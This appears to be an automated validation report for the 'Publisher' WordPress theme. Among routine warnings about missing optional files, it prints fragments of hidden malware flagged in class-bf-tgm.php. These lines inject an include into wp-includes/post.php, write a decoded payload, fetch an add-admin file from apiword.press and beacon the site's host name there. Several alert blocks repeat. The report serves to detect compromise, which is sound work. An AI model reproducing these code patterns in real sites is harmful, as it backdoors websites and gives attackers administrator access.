57
Validation results

Publisher

Publisher

WordPress 4.9.8 theme
57
Critical alerts
  1. Security breaches : Use of base64_decode() Found base64_decode in file class-bf-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Line 89: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
    Found base64_decode in file bs-newsletter-mailchimp.php.
    Line 20: $atts['mailchimp-code'] = rawurldecode( base64_decode( $atts['mailchimp-code'] ) );
  2. Malware : Operations on file system file_get_contents was found in the file other.php
    Line 570: if ( function_exists( 'file_get_contents' ) ) {
    Line 571: return file_get_contents( $path );
    file_get_contents was found in the file class-bf-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-bf-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class-bf-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-bf-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-bf-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-bf-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-bf-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-bf-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class-bf-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class-bf-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-bf-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
Warning
  1. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  2. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  3. Tags : Tags displayThis theme doesn't seem to display tags.
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file better-disqus-comments.php.
    Line 18: <noscript><?php _e( 'Please enable JavaScript to view the <a href='http://disqus.com/?ref_noscript'>comments powered by Disqus.</a>', 'publish
    Possible hard-coded links were found in the file panel-std.php.
    Line 414: 'std' => 'Website Design: <a href='http://betterstudio.com'>BetterStudio</a>',
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  6. Optional files : Presence of search results template file search.phpThis theme does not contain optional file search.php.
  7. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  8. Use of includes : Use of include or requireThe theme appears to use include or require : class-bf-shortcodes-manager.php
    Line 119: include 'shortcode/shortcodes/class-bf-' . $key . '-shortcode.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-bf-tgm.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.

This is a ThemeForest theme. Since Themeforest items are all checked by a human before they appear on their website, ThemeForest verification rules are more permissive than themecheck's and can give a better verification score ( Themeforest requirements ).

99
Warning
  1. Tags : Tags displayThis theme doesn't seem to display tags.
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file better-disqus-comments.php.
    Line 18: <noscript><?php _e( 'Please enable JavaScript to view the <a href='http://disqus.com/?ref_noscript'>comments powered by Disqus.</a>', 'publish
    Possible hard-coded links were found in the file panel-std.php.
    Line 414: 'std' => 'Website Design: <a href='http://betterstudio.com'>BetterStudio</a>',
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  6. Optional files : Presence of search results template file search.phpThis theme does not contain optional file search.php.
  7. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  8. Use of includes : Use of include or requireThe theme appears to use include or require : class-bf-shortcodes-manager.php
    Line 119: include 'shortcode/shortcodes/class-bf-' . $key . '-shortcode.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-bf-tgm.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes